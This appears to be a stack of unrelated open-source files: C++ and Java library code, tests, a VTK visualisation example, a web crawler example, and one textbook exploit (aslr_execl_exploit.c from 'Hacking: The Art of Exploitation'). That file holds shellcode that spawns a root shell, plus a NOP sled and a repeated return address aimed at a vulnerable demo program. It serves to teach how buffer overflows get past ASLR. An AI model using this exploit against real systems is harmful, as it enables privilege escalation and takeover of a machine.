triggering literals and literal reachabilities. * Used for exclusive analysis. * @param exclusive_roles output mapping between engine id and its exclusive * group id */ void exclusiveAnalysisInfix(const RoseBuildImpl &build, const std::map<u32, std::vector<RoseVertex>> &vertex_map, std::set<RoleInfo<left_id>> &roleInfoSet, std::vector<std::vector<u32>> &exclusive_roles); /** * Exclusive analysis for suffix engines. * * @param build rose build info mainly used to set exclusive chunk size here * @param vertex_map mapping between engine id and rose vertices * related to this engine * @param roleInfoSet structure contains role properties including suffix info, * triggering literals and literal reachabilities. * Used for exclusive analysis. * @param exclusive_roles output mapping between engine id and its exclusive * group id */ void exclusiveAnalysisSuffix(const RoseBuildImpl &build, const std::map<u32, std::vector<RoseVertex>> &vertex_map, std::set<RoleInfo<suffix_id>> &roleInfoSet, std::vector<std::vector<u32>> &exclusive_roles); } // namespace ue2 #endif //ROSE_BUILD_EXCLUSIVE_H
1,639
1,146
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package com.aliyun.oss.integrationtests; import java.io.File; import java.io.InputStream; import java.util.Date; import java.util.Random; import junit.framework.Assert; import org.junit.After; import org.junit.Before; import org.junit.Ignore; import org.junit.Test; import com.aliyun.oss.ClientBuilderConfiguration; import com.aliyun.oss.ClientConfiguration; import com.aliyun.oss.ClientErrorCode; import com.aliyun.oss.ClientException; import com.aliyun.oss.OSS; import com.aliyun.oss.OSSClient; import com.aliyun.oss.OSSClientBuilder; import com.aliyun.oss.OSSErrorCode; import com.aliyun.oss.OSSException; import com.aliyun.oss.model.DownloadFileRequest; import com.aliyun.oss.model.OSSObject; import com.aliyun.oss.model.ObjectListing; import com.aliyun.oss.model.UploadFileRequest; /** * Testing request timeout */ @Ignore public class RequestTimeoutTest extends TestBase { private final static String endpoint = TestConfig.OSS_TEST_ENDPOINT; private final static String accessId = TestConfig.OSS_TEST_ACCESS_KEY_ID; private final static String accessKey = TestConfig.OSS_TEST_ACCESS_KEY_SECRET; private static String bucketName; private final static int requestTimeout = 10 * 1000; private static OSSClient ossClient; @SuppressWarnings("deprecation") @Before public void setUp() throws Exception { long ticks = new Date().getTime() / 1000 + new Random().nextInt(5000); bucketName = BUCKET_NAME_PREFIX + ticks; if (ossClient == null) { ClientConfiguration config = new ClientConfiguration(); config.setRequestTimeout(requestTimeout); config.setRequestTimeoutEnabled(true); //config.setMaxConnections(1); ossClient = new OSSClient(endpoint, accessId, accessKey, config); ossClient.createBucket(bucketName); } } @After public void tearDown() throws Exception { abortAllMultipartUploads(ossClient, bucketName); deleteBucketWithObjects(ossClient, bucketName); if (ossClient != null) { ossClient.shutdown(); ossClient = null; } } /** * Testing normal request. */ @Test public void testObjectOperationsNormal() throws Exception { String key = "test-object-operation-normal"; try { // get ossClient.putObject(bucketName, key, TestUtils.genFixedLengthInputStream(64)); // put OSSObject ossObject = ossClient.getObject(bucketName, key); ossObject.getObjectContent().close(); // delete ossClient.deleteObject(bucketName, key); // upload File file = createSampleFile(key, 1024 * 500); UploadFileRequest uploadFileRequest = new UploadFileRequest(bucketName, key); uploadFileRequest.setUploadFile(file.getAbsolutePath()); uploadFileRequest.setPartSize(1024 * 100); uploadFileRequest.setTaskNum(10); uploadFileRequest.setEnableCheckpoint(true); ossClient.uploadFile(uploadFileRequest); // download DownloadFileRequest downloadFileRequest = new DownloadFileRequest(bucketName, key); downloadFileRequest.setDownloadFile(file.getAbsolutePath()); downloadFileRequest.setTaskNum(10); downloadFileRequest.setEnableCheckpoint(true); ossClient.downloadFile(downloadFileRequest); ossClient.deleteObject(bucketName, key); file.delete(); } catch (Exception e) { Assert.fail(e.getMessage()); } catch (Throwable t) { Assert.fail(t.getMessage()); } } /** * Tests request with a new short timeout value */ @Test public void testRequestTimeoutEffective() throws Exception { String key = "test-request-timeout-effective"; try { ossClient.getClientConfiguration().setRequestTimeout(1); ossClient.getObject(bucketName, key); Assert.fail("Get object should not be successful"); } catch (ClientException e) { Assert.assertEquals(OSSErrorCode.REQUEST_TIMEOUT, e.getErrorCode()); } finally { ossClient.getClientConfiguration().setRequestTimeout(requestTimeout); } } /** * Negative test cases * Reading a non-existing bucket, object. * Uploading a null stream. * Uploading an object with 1ms timeout value. */ @Test public void testObjectOperationsNegative() throws Exception { String bucket = "test-object-operations-negative"; String key = "test-object-operations-negative"; try { ossClient.getBucketInfo(bucket); Assert.fail("Get bucket info should not be successful"); } catch (OSSException e) { Assert.assertEquals(OSSErrorCode.NO_SUCH_BUCKET, e.getErrorCode()); } try { ossClient.getObject(bucketName, key); Assert.fail("Get object should not be successful"); } catch (OSSException e) { Assert.assertEquals(OSSErrorCode.NO_SUCH_KEY, e.getErrorCode()); } try { InputStream inputStream = null; ossClient.putObject(bucket, key, inputStream); Assert.fail("Put object should not be successful"); } catch (Exception e) { Assert.assertTrue(e instanceof IllegalArgumentException); } try { ossClient.getClientConfiguration().setRequestTimeout(1); ossClient.getObject(bucketName, key); Assert.fail("Get object should not be successful"); } catch (ClientException e) { Assert.assertEquals(OSSErrorCode.REQUEST_TIMEOUT, e.getErrorCode()); } finally { ossClient.getClientConfiguration().setRequestTimeout(requestTimeout); } } /** * The connection should be reused after time out. */ @Test public void testOperationsNormalAfterTimeout() throws Exception { String key = "test-operation-after-timeout"; try { try { ossClient.getClientConfiguration().setRequestTimeout(1); ossClient.putObject(bucketName, key, TestUtils.genFixedLengthInputStream(64)); Assert.fail("Get object should not be successful"); } catch (ClientException e) { Assert.assertEquals(OSSErrorCode.REQUEST_TIMEOUT, e.getErrorCode()); } finally { ossClient.getClientConfiguration().setRequestTimeout(requestTimeout); } ossClient.putObject(bucketName, key, TestUtils.genFixedLengthInputStream(64)); OSSObject ossObject = ossClient.getObject(bucketName, key); ossObject.getObjectContent().close(); ossClient.deleteObject(bucketName, key); } catch (Exception e) { e.printStackTrace(); Assert.fail(e.getMessage()); } } /** * Test operations after package loss. * To simulate package eloss, we use iptables in linux and cut the network in windows. */ @Test public void testOperationsNormalAfterPacketLoss() throws Exception { String key = "test-operation-after-packet-loss"; try { File file = createSampleFile(key, 1024 * 1024 * 200); //System.out.println("start disconnect"); ossClient.getClientConfiguration().setRequestTimeout(60 * 60 * 1000); try { ossClient.putObject(bucketName, key, file); Assert.fail("Get object should not be successful"); } catch (ClientException e) { Assert.assertEquals(OSSErrorCode.REQUEST_TIMEOUT, e.getErrorCode()); } finally { ossClient.getClientConfiguration().setRequestTimeout(requestTimeout); } ObjectListing objectListing = ossClient.listObjects(bucketName, key); Assert.assertEquals(objectListing.getObjectSummaries().size(), 1); ossClient.deleteObject(bucketName, key); } catch (Exception e) { e.printStackTrace(); Assert.fail(e.getMessage()); } } /** * Massive concurrent requests. The request completion time should be similar. */ @Test public void testConcurrentOperationsNormal() throws Exception { String key = "test-concurrent-operation-normal"; try { ossClient.getClientConfiguration().setRequestTimeout(100 * 1000); Thread threads[] = new Thread[100]; for (int i = 0; i < 100; i++) { threads[i] = new OperationThread(key + i); } for (int i = 0; i < 100; i++) { threads[i].start(); } for (int i = 0; i < 100; i++) { threads[i].join(); } } catch (Exception e) { e.printStackTrace(); Assert.fail(e.getMessage()); } } class OperationThread extends Thread { private String key; public OperationThread(String key) { this.key = key; } public void run() { for (int i = 0; i < 100; i++) { try { ossClient.putObject(bucketName, key, TestUtils.genFixedLengthInputStream(1024 * 10)); OSSObject ossObject = ossClient.getObject(bucketName, key); ossObject.getObjectContent().close(); ossClient.deleteObject(bucketName, key); } catch (Exception e) { e.printStackTrace(); Assert.fail(e.getMessage()); } } } } /** * Multiple OSSClient instances test. * Each instance should work independently without being impacted by other instances. * So one timeout instance should not make other instances timeout. * */ @Test public void testMultiOssClientIndependent() throws Exception { String key = "test-multi-client-independent"; try { ClientBuilderConfiguration config = new ClientBuilderConfiguration(); config.setRequestTimeout(1); config.setRequestTimeoutEnabled(true); config.setMaxConnections(1); OSS client = new OSSClientBuilder().build(endpoint, accessId, accessKey, config); Thread threads[] = new Thread[10]; for (int i = 0; i < 10; i++) { if (i % 2 == 0) { threads[i] = new TimeoutOperationThread(client, key + i); } else { threads[i] = new OperationThread(key + i); } } for (int i = 0; i < 10; i++) { threads[i].start(); } for (int i = 0; i < 10; i++) { threads[i].join(); } } catch (Exception e) { e.printStackTrace(); Assert.fail(e.getMessage()); } } class TimeoutOperationThread extends Thread { private String key; private OSS client; public TimeoutOperationThread(OSS client, String key) { this.client = client; this.key = key; } public void run() { for (int i = 0; i < 100; i++) { try { client.putObject(bucketName, key, TestUtils.genFixedLengthInputStream(1024 * 10)); Assert.fail("Put object should not be successful"); } catch (ClientException e) { Assert.assertEquals(OSSErrorCode.REQUEST_TIMEOUT, e.getErrorCode()); } try { client.getObject(bucketName, key); Assert.fail("Get object should not be successful"); } catch (ClientException e) { Assert.assertEquals(OSSErrorCode.REQUEST_TIMEOUT, e.getErrorCode()); } try { client.deleteObject(bucketName, key); Assert.fail("Delete object should not be successful"); } catch (ClientException e) { Assert.assertEquals(OSSErrorCode.REQUEST_TIMEOUT, e.getErrorCode()); } } } } /** * Testing connection timeout. */ @Test public void testClientConfigIndependent() throws Exception { String key = "test-client-config-independent"; ClientBuilderConfiguration config = new ClientBuilderConfiguration(); config.setRequestTimeout(requestTimeout); config.setRequestTimeoutEnabled(true); config.setConnectionTimeout(1); OSS client = new OSSClientBuilder().build(endpoint, accessId, accessKey, config); try { client.putObject(bucketName, key, TestUtils.genFixedLengthInputStream(1024)); Assert.fail("Put object should not be successful"); } catch (ClientException e) { Assert.assertEquals(ClientErrorCode.CONNECTION_TIMEOUT, e.getErrorCode()); } finally { client.shutdown(); } } /** * Testing grace exist after connection timeout */ @Test public void testExitNormalAfterTimeout() throws Exception { String key = "test-exit-after-timeout"; ClientBuilderConfiguration config = new ClientBuilderConfiguration(); config.setRequestTimeout(requestTimeout); config.setRequestTimeoutEnabled(true); config.setMaxConnections(1); OSS client = new OSSClientBuilder().build(endpoint, accessId, accessKey, config); try { client.putObject(bucketName, key, TestUtils.genFixedLengthInputStream(1024 * 10)); Assert.fail("Put object should not be successful"); } catch (ClientException e) { Assert.assertEquals(OSSErrorCode.REQUEST_TIMEOUT, e.getErrorCode()); } } }
6,906
3,182
package de.plushnikov.intellij.plugin.inspection; import com.intellij.codeInspection.InspectionProfileEntry; /** * @author <NAME> */ public class DiverseInspectionTest extends LombokInspectionTest { @Override protected String getTestDataPath() { return TEST_DATA_INSPECTION_DIRECTORY + "/diverse"; } @Override protected InspectionProfileEntry getInspection() { return new LombokInspection(); } public void testDataEqualsAndHashCodeOverride() { doTest(); } public void testEqualsAndHashCodeCallSuper() { doTest(); } public void testIssue37() { doTest(); } public void testSetterOnFinalField() { doTest(); } // public void testValInspection() { // doTest(); // } }
244
3,084
<filename>network/wlan/WDI/COMMON/Hotspot20.h<gh_stars>1000+ #ifndef __INC_HOTSPOT20_H #define __INC_HOTSPOT20_H RT_STATUS GAS_OnInitReq( IN PADAPTER pAdapter, IN PRT_RFD pRfd, IN POCTET_STRING posMpdu ); RT_STATUS GAS_OnInitRsp( IN PADAPTER pAdapter, IN PRT_RFD pRfd, IN POCTET_STRING posMpdu ); RT_STATUS GAS_OnComebackReq( IN PADAPTER pAdapter, IN PRT_RFD pRfd, IN POCTET_STRING posMpdu ); RT_STATUS GAS_OnComebackRsp( IN PADAPTER pAdapter, IN PRT_RFD pRfd, IN POCTET_STRING posMpdu ); #endif // #ifndef __INC_HOTSPOT20_H
353
436
/* * Copyright 2003-2005 the original author or authors. * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * */ package com.jdon.jivejdon.util; import java.awt.Color; import java.beans.BeanInfo; import java.beans.IntrospectionException; import java.beans.Introspector; import java.beans.PropertyDescriptor; import java.lang.reflect.Method; import java.util.HashMap; import java.util.Iterator; import java.util.Map; import java.util.StringTokenizer; import org.apache.logging.log4j.*; import com.jdon.jivejdon.domain.model.message.output.beanutil.FilterBeanInfo; /** * A utility class that provides methods that are useful for dealing with * Java Beans. */ public class BeanUtils { private final static Logger logger = LogManager.getLogger(BeanUtils.class); /** * Sets the properties of a Java Bean based on the String name/value pairs in * the specifieed Map. Because this method has to know how to convert a * String value into the correct type for the bean, only a few bean property * types are supported. They are: String, boolean, int, long, float, double, * Color, and Class.<p> * * If key/value pairs exist in the Map that don't correspond to properties * of the bean, they will be ignored. * * @param bean the JavaBean to set properties on. * @param properties String name/value pairs of the properties to set. */ public static void setProperties(Object bean, Map properties) { try { // Loop through all the property names in the Map for (Iterator iter = properties.keySet().iterator(); iter.hasNext();) { String propName = (String) iter.next(); try { // Create a property descriptor for the named property. If // the bean doesn't have the named property, an // Introspection will be thrown. PropertyDescriptor descriptor = new PropertyDescriptor(propName, bean.getClass()); // Load the class type of the property. Class propertyType = descriptor.getPropertyType(); // Get the value of the property by converting it from a // String to the correct object type. Object value = decode(propertyType, (String) properties.get(propName)); // Set the value of the bean. descriptor.getWriteMethod().invoke(bean, new Object[] { value }); logger.debug(" 1propName=" + propName + ":propValue=" + (String) properties.get(propName)); logger.debug(" 1propName=" + propName + ":propValue=" + value); } catch (IntrospectionException ie) { // Ignore. This exception means that the key in the map // does not correspond to a property of the bean. ie.printStackTrace(); logger.error("bean getWriteMethod invoke error propname=" + propName); } } } catch (Exception e) { e.printStackTrace(); } } /** * Gets the properties from a Java Bean and returns them in a Map of String * name/value pairs. Because this method has to know how to convert a * bean property into a String value, only a few bean property * types are supported. They are: String, boolean, int, long, float, double, * Color, and Class. * * @param bean a Java Bean to get properties from. * @return a Map of all properties as String name/value pairs. */ public static Map getProperties(Object bean) { Map properties = new HashMap(); try { logger.debug("getProperties=" + bean.getClass().getName()); BeanInfo beanInfo = Introspector.getBeanInfo(bean.getClass(), Object.class); // Loop through all properties of the bean. PropertyDescriptor[] descriptors = beanInfo.getPropertyDescriptors(); String[] names = new String[descriptors.length]; for (int i = 0; i < names.length; i++) { // Determine the property name. String name = descriptors[i].getName(); Method methodc = descriptors[i].getReadMethod(); logger.debug("name=" + name); logger.debug("Method=" + methodc.getName()); // Decode the property value using the property type and // encoded String value. Object[] args = null; Object value = methodc.invoke(bean, args); // Add to Map, encoding the value as a String. properties.put(name, encode(value)); } } catch (Exception e) { e.printStackTrace(); } return properties; } /** * Returns the PropertyDescriptor array for the specified Java Bean Class. * The method also does a special check to see of the bean has a BeanInfo * class that extends the JiveBeanInfo class. If yes, we load the * PropertyDescriptor array directly from that BeanInfo class rather than * through the Introspector in order to preserve the desired ordering of * properties. * * @param beanClass the Class of the JavaBean. * @return the PropertyDescriptor array for the specified Java Bean Class. */ public static PropertyDescriptor[] getPropertyDescriptors(Class beanClass) throws IntrospectionException { // See if the Java Bean has a BeanInfo class that implements // JiveBeanInfo. If so, return the PropertyDescriptor from that // class. This will bypass properties of parent classes, but this is // the normal behavior of classes that implement JiveBeanInfo. try { FilterBeanInfo beanInfo = (FilterBeanInfo) Class.forName(beanClass.getName() + "BeanInfo").newInstance(); return beanInfo.getPropertyDescriptors(); } catch (Exception e) { logger.error(e); } // Otherwise, return the PropertyDescriptors from the Introspector. return Introspector.getBeanInfo(beanClass, Object.class).getPropertyDescriptors(); } /** * Encodes a bean property value as a String. If the object type is not * supported, null will be returned. * * @param value an Object to encode in a String representation. */ private static String encode(Object value) { if (value instanceof String) { return (String) value; } if (value instanceof Boolean || value instanceof Integer || value instanceof Long || value instanceof Float || value instanceof Double) { return value.toString(); } if (value instanceof Color) { Color color = (Color) value; return color.getRed() + "," + color.getGreen() + "," + color.getBlue(); } if (value instanceof Class) { return ((Class) value).getName(); } return null; } /** * Decodes a String into an object of the specified type. If the object * type is not supported, null will be returned. * * @paran type the type of the property. * @param the encode String value to decode. * @return the String value decoded into the specified type. */ private static Object decode(Class type, String value) throws Exception { if (type.getName().equals("java.lang.String")) { return value; } if (type.getName().equals("boolean")) { return Boolean.valueOf(value); } if (type.getName().equals("int")) { return Integer.valueOf(value); } if (type.getName().equals("long")) { return Long.valueOf(value); } if (type.getName().equals("float")) { return Float.valueOf(value); } if (type.getName().equals("double")) { return Double.valueOf(value); } if (type.getName().equals("java.awt.Color")) { StringTokenizer tokens = new StringTokenizer(value, ","); int red = Integer.parseInt(tokens.nextToken()); int green = Integer.parseInt(tokens.nextToken()); int blue = Integer.parseInt(tokens.nextToken()); return new Color(red, green, blue); } if (type.getName().equals("java.lang.Class")) { return Class.forName(value); } return null; } }
3,531
309
#include <vtkActor.h> #include <vtkAppendPolyData.h> #include <vtkCamera.h> #include <vtkFollower.h> #include <vtkLinearExtrusionFilter.h> #include <vtkNamedColors.h> #include <vtkOutlineFilter.h> #include <vtkPolyDataMapper.h> #include <vtkPolyDataReader.h> #include <vtkProperty.h> #include <vtkRenderer.h> #include <vtkRenderWindow.h> #include <vtkRenderWindowInteractor.h> #include <vtkRibbonFilter.h> #include <vtkTubeFilter.h> #include <vtkSmartPointer.h> #include <vtkSphereSource.h> #include <vtkTransform.h> #include <vtkTransformPolyDataFilter.h> #include <vtkVectorText.h> #include <vtksys/SystemTools.hxx> #include <string> namespace { void AddStock(std::vector<vtkSmartPointer<vtkRenderer>> renderers, char *filename, std::string name, double &zPosition, bool useTubes); } int main (int argc, char *argv[]) { vtkSmartPointer<vtkNamedColors> colors = vtkSmartPointer<vtkNamedColors>::New(); // set up the stocks std::vector<vtkSmartPointer<vtkRenderer>> renderers; vtkSmartPointer<vtkRenderer> topRenderer = vtkSmartPointer<vtkRenderer>::New(); vtkSmartPointer<vtkRenderer> bottomRenderer = vtkSmartPointer<vtkRenderer>::New(); renderers.push_back(topRenderer); renderers.push_back(bottomRenderer); bool useTubes = true; if (atoi(argv[argc-1]) == 1) { useTubes = false; } double zPosition = 0.0; for (int i = 1; i < argc - 1; ++i) { AddStock(renderers, argv[i], vtksys::SystemTools::GetFilenameWithoutExtension(argv[i]), zPosition, useTubes); } // Setup render window and interactor vtkSmartPointer<vtkRenderWindow> renderWindow = vtkSmartPointer<vtkRenderWindow>::New(); renderWindow->AddRenderer(renderers[0]); renderWindow->AddRenderer(renderers[1]); vtkSmartPointer<vtkRenderWindowInteractor> renderWindowInteractor = vtkSmartPointer<vtkRenderWindowInteractor>::New(); renderWindowInteractor->SetRenderWindow(renderWindow); renderers[0]->SetViewport(0.0, .4, 1.0, 1.0); renderers[1]->SetViewport(0.0, 0.0, 1.0, .4); renderers[0]->GetActiveCamera()->SetViewAngle(5.0); renderers[0]->ResetCamera(); renderers[0]->GetActiveCamera()->Zoom(1.4); renderers[0]->ResetCameraClippingRange(); renderers[0]->SetBackground(colors->GetColor3d("SteelBlue").GetData()); renderers[1]->GetActiveCamera()->SetViewUp(0, 0, -1); renderers[1]->GetActiveCamera()->SetPosition(0, 1, 0); renderers[1]->GetActiveCamera()->SetViewAngle(5.0); renderers[1]->ResetCamera(); renderers[1]->GetActiveCamera()->Zoom(2.2); renderers[1]->ResetCameraClippingRange(); renderers[1]->SetBackground(colors->GetColor3d("LightSteelBlue").GetData()); renderWindow->SetSize(500, 800); renderWindow->Render(); renderWindowInteractor->Start(); return EXIT_SUCCESS; } namespace { // create the stocks void AddStock(std::vector<vtkSmartPointer<vtkRenderer>> renderers, char *filename, std::string name, double &zPosition, bool useTubes) { std::cout << "Adding " << name << std::endl; // read the data vtkSmartPointer<vtkPolyDataReader> PolyDataRead = vtkSmartPointer<vtkPolyDataReader>::New(); PolyDataRead->SetFileName(filename); PolyDataRead->Update(); // create labels vtkSmartPointer<vtkVectorText> TextSrc = vtkSmartPointer<vtkVectorText>::New(); TextSrc->SetText(name.c_str()); vtkIdType numberOfPoints = PolyDataRead->GetOutput()->GetNumberOfPoints(); double nameLocation[3]; double x, y, z; vtkIdType nameIndex = (numberOfPoints - 1) * .8; PolyDataRead->GetOutput()->GetPoint(nameIndex, nameLocation); x = nameLocation[0] * .15; y = nameLocation[1] + 5.0; z = zPosition; // Create a tube and ribbpn filter. One or the other will be used vtkSmartPointer<vtkTubeFilter> TubeFilter = vtkSmartPointer<vtkTubeFilter>::New(); TubeFilter->SetInputConnection(PolyDataRead->GetOutputPort()); TubeFilter->SetNumberOfSides(8); TubeFilter->SetRadius(0.5); TubeFilter->SetRadiusFactor(10000); vtkSmartPointer<vtkRibbonFilter> RibbonFilter = vtkSmartPointer<vtkRibbonFilter>::New(); RibbonFilter->SetInputConnection(PolyDataRead->GetOutputPort()); RibbonFilter->VaryWidthOn(); RibbonFilter->SetWidthFactor(5); RibbonFilter->SetDefaultNormal(0, 1, 0); RibbonFilter->UseDefaultNormalOn(); vtkSmartPointer<vtkLinearExtrusionFilter> Extrude = vtkSmartPointer<vtkLinearExtrusionFilter>::New(); Extrude->SetInputConnection(RibbonFilter->GetOutputPort()); Extrude->SetVector(0, 1, 0); Extrude->SetExtrusionType(1); Extrude->SetScaleFactor(0.7); vtkSmartPointer<vtkTransform> Transform = vtkSmartPointer<vtkTransform>::New(); Transform->Translate(0, 0, zPosition); Transform->Scale(0.15, 1, 1); vtkSmartPointer<vtkTransformPolyDataFilter> TransformFilter = vtkSmartPointer<vtkTransformPolyDataFilter>::New(); TransformFilter->SetTransform(Transform); // Select tubes or ribbons if (useTubes) { TransformFilter->SetInputConnection(TubeFilter->GetOutputPort()); } else { TransformFilter->SetInputConnection(Extrude->GetOutputPort()); } for (size_t r = 0; r < renderers.size(); ++r) { vtkSmartPointer<vtkPolyDataMapper> LabelMapper = vtkSmartPointer<vtkPolyDataMapper>::New(); LabelMapper->SetInputConnection(TextSrc->GetOutputPort()); vtkSmartPointer<vtkFollower> LabelActor = vtkSmartPointer<vtkFollower>::New(); LabelActor->SetMapper(LabelMapper); LabelActor->SetPosition(x, y, z); LabelActor->SetScale(2, 2, 2); LabelActor->SetOrigin(TextSrc->GetOutput()->GetCenter()); // increment zPosition zPosition += 8.0; vtkSmartPointer<vtkPolyDataMapper> StockMapper = vtkSmartPointer<vtkPolyDataMapper>::New(); StockMapper->SetInputConnection(TransformFilter->GetOutputPort()); StockMapper->SetScalarRange(0, 8000); vtkSmartPointer<vtkActor> StockActor = vtkSmartPointer<vtkActor>::New(); StockActor->SetMapper(StockMapper); renderers[r]->AddActor(StockActor); renderers[r]->AddActor(LabelActor); LabelActor->SetCamera(renderers[r]->GetActiveCamera()); } return; } }
2,472
640
<filename>books_and_notes/professional_courses/Security/sources/extra_books/Hacking:The Art of Exploitation (Second Edition)源代码/booksrc/aslr_execl_exploit.c<gh_stars>100-1000 #include <stdio.h> #include <unistd.h> #include <string.h> char shellcode[]= "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68" "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89" "\xe1\xcd\x80"; // standard shellcode int main(int argc, char *argv[]) { unsigned int i, ret, offset; char buffer[1000]; printf("i is at %p\n", &i); if(argc > 1) // set offset offset = atoi(argv[1]); ret = (unsigned int) &i - offset + 200; // set return address printf("ret addr is %p\n", ret); for(i=0; i < 90; i+=4) // fill buffer with return address *((unsigned int *)(buffer+i)) = ret; memset(buffer+84, 0x90, 900); // build NOP sled memcpy(buffer+900, shellcode, sizeof(shellcode)); execl("./aslr_demo", "aslr_demo", buffer, NULL); }
456
1,656
<gh_stars>1000+ /* * Copyright 2018-2021 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.springframework.cloud.sleuth.instrument.session; import java.util.Map; import org.springframework.cloud.sleuth.Tracer; import org.springframework.cloud.sleuth.docs.AssertingSpan; import org.springframework.session.FindByIndexNameSessionRepository; class TraceFindByIndexNameSessionRepository extends TraceSessionRepository implements FindByIndexNameSessionRepository { private final FindByIndexNameSessionRepository delegate; TraceFindByIndexNameSessionRepository(Tracer tracer, FindByIndexNameSessionRepository delegate) { super(tracer, delegate); this.delegate = delegate; } @Override public Map findByPrincipalName(String principalName) { AssertingSpan span = newSessionFindSpan(); try (Tracer.SpanInScope ws = this.tracer.withSpan(span.start())) { return this.delegate.findByPrincipalName(principalName); } finally { span.end(); } } private AssertingSpan newSessionFindSpan() { return AssertingSpan.of(SleuthSessionSpan.SESSION_FIND_SPAN, this.tracer.nextSpan()) .name(SleuthSessionSpan.SESSION_FIND_SPAN.getName()); } @Override public Map findByIndexNameAndIndexValue(String indexName, String indexValue) { AssertingSpan span = newSessionFindSpan(); try (Tracer.SpanInScope ws = this.tracer.withSpan(span.start())) { span.tag(SleuthSessionSpan.Tags.INDEX_NAME, indexName); return this.delegate.findByIndexNameAndIndexValue(indexName, indexValue); } finally { span.end(); } } }
677
11,052
package us.codecraft.webmagic.example; import us.codecraft.webmagic.Site; import us.codecraft.webmagic.model.ConsolePageModelPipeline; import us.codecraft.webmagic.model.HasKey; import us.codecraft.webmagic.model.OOSpider; import us.codecraft.webmagic.model.annotation.ExtractBy; import us.codecraft.webmagic.model.annotation.ExtractByUrl; import java.util.List; /** * @author <EMAIL> <br> * @since 0.4.1 */ public class GithubRepoApi implements HasKey { @ExtractBy(type = ExtractBy.Type.JsonPath, value = "$.name", source = ExtractBy.Source.RawText) private String name; @ExtractBy(type = ExtractBy.Type.JsonPath, value = "$..owner.login", source = ExtractBy.Source.RawText) private String author; @ExtractBy(type = ExtractBy.Type.JsonPath, value = "$.language",multi = true, source = ExtractBy.Source.RawText) private List<String> language; @ExtractBy(type = ExtractBy.Type.JsonPath, value = "$.stargazers_count", source = ExtractBy.Source.RawText) private int star; @ExtractBy(type = ExtractBy.Type.JsonPath, value = "$.forks_count", source = ExtractBy.Source.RawText) private int fork; @ExtractByUrl private String url; public static void main(String[] args) { OOSpider.create(Site.me().setSleepTime(100) , new ConsolePageModelPipeline(), GithubRepoApi.class) .addUrl("https://api.github.com/repos/code4craft/webmagic").run(); } @Override public String key() { return author + ":" + name; } public String getName() { return name; } public String getAuthor() { return author; } public List<String> getLanguage() { return language; } public String getUrl() { return url; } public int getStar() { return star; } public int getFork() { return fork; } }
737
839
/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.cxf.tools.common.toolspec; import java.io.InputStream; import java.io.OutputStream; import java.lang.reflect.Constructor; import java.util.logging.Level; import java.util.logging.Logger; import org.apache.cxf.common.i18n.Message; import org.apache.cxf.common.logging.LogUtils; import org.apache.cxf.tools.common.ToolContext; import org.apache.cxf.tools.common.ToolException; public final class ToolRunner { private ToolRunner() { // utility class - never constructed } public static void runTool(Class<? extends ToolContainer> clz, InputStream toolspecStream, boolean validate, String[] args) throws Exception { runTool(clz, toolspecStream, validate, args, true); } public static void runTool(Class<? extends ToolContainer> clz, InputStream toolspecStream, boolean validate, String[] args, OutputStream os) throws Exception { runTool(clz, toolspecStream, validate, args, true, null, os); } public static void runTool(Class<? extends ToolContainer> clz, InputStream toolspecStream, boolean validate, String[] args, ToolContext context) throws Exception { runTool(clz, toolspecStream, validate, args, true, context, null); } public static void runTool(Class<? extends ToolContainer> clz, InputStream toolspecStream, boolean validate, String[] args, boolean exitOnFinish) throws Exception { runTool(clz, toolspecStream, validate, args, true, null, null); } public static void runTool(Class<? extends ToolContainer> clz, InputStream toolspecStream, boolean validate, String[] args, boolean exitOnFinish, ToolContext context) throws Exception { runTool(clz, toolspecStream, validate, args, exitOnFinish, context, null); } public static void runTool(Class<? extends ToolContainer> clz, InputStream toolspecStream, boolean validate, String[] args, boolean exitOnFinish, ToolContext context, OutputStream os) throws Exception { System.setProperty("org.apache.cxf.JDKBugHacks.defaultUsesCaches", "true"); final ToolContainer container; try { Constructor<? extends ToolContainer> cons = clz.getConstructor( new Class[] { ToolSpec.class }); container = cons.newInstance( new Object[] { new ToolSpec(toolspecStream, validate) }); } catch (Exception ex) { Logger log = LogUtils.getL7dLogger(ToolRunner.class); Message message = new Message("CLZ_CANNOT_BE_CONSTRUCTED", log, clz.getName()); log.log(Level.SEVERE, message.toString()); throw new ToolException(message, ex); } try { container.setArguments(args); if (os != null) { container.setErrOutputStream(os); container.setOutOutputStream(os); } container.setContext(context); container.execute(exitOnFinish); } catch (Exception ex) { throw ex; } } }
2,059
1,821
